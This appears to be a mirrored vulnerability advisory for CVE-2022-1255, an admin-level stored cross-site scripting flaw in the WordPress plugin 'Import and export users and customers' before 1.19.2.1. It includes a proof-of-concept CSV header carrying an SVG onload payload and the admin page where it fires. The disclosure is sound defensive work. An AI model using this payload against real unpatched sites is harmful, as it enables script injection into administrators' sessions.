Lucene search
0x23.soWPEX-ID:22FE68C4-8F47-491E-BE87-5E8E40535A82HistoryApr 11, 2022 - 12:00 a.m.
Import and export users and customers < 1.19.2.1 - Admin+ Stored Cross-Site Scripting
2022-04-1100:00:00
0x23.so
69
0.001 Low
EPSS
Percentile
24.9%
The plugin does not sanitise and escaped imported CSV data, which could allow high privilege users to import malicious javascript code and lead to Stored Cross-Site Scripting issues
As admin, import the below CSV file via Tools > Import and export users and customers (/wp-admin/tools.php?page=acui)
user_login user_email display_name role<svg onload=confirm(/XSS/)// first_name last_name billing_first_name billing_last_name billing_company billing_email billing_phone billing_country billing_address_1 billing_address_2 billing_city billing_state billing_postcode shipping_first_name shipping_last_name shipping_company shipping_country shipping_address_1 shipping_address_2 shipping_city shipping_state shipping_postcode
Then the XSS will be triggered after the import, as well as in the Extra profile fields page of the plugin (/wp-admin/tools.php?page=acui&tab=columns)Related
prion
prion
Cross site scripting
2022-05-02 16:15:00
cvelist
cvelist
nvd
nvd
CVE-2022-1255
2022-05-02 16:15:08
wpvulndb
wpvulndb
cve
cve
CVE-2022-1255
2022-05-02 16:15:08
patchstack
patchstack
cnvd
cnvd
WordPress Import and export users and customers plugin跨站脚本漏洞
2022-05-07 00:00:00